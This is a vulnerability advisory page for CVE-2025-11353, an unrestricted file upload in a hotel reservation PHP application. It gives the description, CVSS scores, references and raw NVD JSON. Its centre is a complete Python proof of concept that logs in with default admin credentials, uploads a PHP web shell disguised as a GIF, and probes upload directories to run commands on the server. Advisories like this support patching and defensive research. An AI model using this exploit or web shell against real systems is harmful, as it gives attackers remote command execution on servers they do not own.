CVE-2025-11353

Description

A vulnerability was detected in code-projects Online Hotel Reservation System 1.0. This impacts an unknown function of the file /admin/addgalleryexec.php. Performing manipulation of the argument image results in unrestricted upload. The attack is possible to be carried out remotely. The exploit is now public and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:online_hotel_reservation_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Online Hotel Reservation System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11353 - Online Hotel Reservation System Unrestricted File Upload PoC
# Vulnerability: Unrestricted file upload in /admin/addgalleryexec.php via 'image' parameter
# Author: Security Researcher

import requests

TARGET_URL = "http://target.com"
ADMIN_PATH = "/admin/"
UPLOAD_PATH = "/admin/addgalleryexec.php"
USERNAME = "admin"
PASSWORD = "admin"

# Step 1: Login to admin panel to obtain session cookie
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD,
    "login": "submit"
}

# Perform login
login_url = TARGET_URL + ADMIN_PATH
resp = session.post(login_url, data=login_data)
print(f"[*] Login response status: {resp.status_code}")

# Step 2: Prepare malicious PHP web shell disguised as image
# The shell payload will be saved with .php extension
web_shell_content = b"GIF89a;\n<?php echo system($_GET['cmd']); ?>"

files = {
    "image": ("shell.php", web_shell_content, "image/gif")
}

# Step 3: Upload the malicious file
upload_url = TARGET_URL + UPLOAD_PATH
print(f"[*] Uploading payload to: {upload_url}")
resp = session.post(upload_url, files=files)
print(f"[*] Upload response status: {resp.status_code}")

# Step 4: Try to access the uploaded shell
# Common upload directories to check
upload_dirs = [
    "/admin/uploads/",
    "/admin/images/",
    "/uploads/",
    "/images/gallery/",
    "/gallery/"
]

for upload_dir in upload_dirs:
    shell_url = TARGET_URL + upload_dir + "shell.php"
    print(f"[*] Trying shell at: {shell_url}")
    resp = requests.get(shell_url + "?cmd=id")
    if resp.status_code == 200 and "uid=" in resp.text:
        print(f"[+] SUCCESS! Shell is accessible at: {shell_url}")
        print(f"[+] Command output: {resp.text}")
        break
else:
    print("[-] Could not locate uploaded shell, check upload directory manually")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11353
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11353
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11353/
[4] VulDB https://vuldb.com/cve/CVE-2025-11353
[5] https://code-projects.org/
[6] https://github.com/zhicat/C/issues/30
[7] https://vuldb.com/?ctiid.327238
[8] https://vuldb.com/?id.327238
[9] https://vuldb.com/?submit.664920

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11353", "sourceIdentifier": "[email protected]", "published": "2025-10-07T06:15:36.403", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in code-projects Online Hotel Reservation System 1.0. This impacts an unknown function of the file /admin/addgalleryexec.php. Performing manipulation of the argument image results in unrestricted upload. The attack is possible to be carried out remotely. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:online_hotel_reservation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A239DB3D-0C8F-46E2-BF53-5EE5BA3DBC9D"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/zhicat/C/issues/30", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.327238", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327238", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664920", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}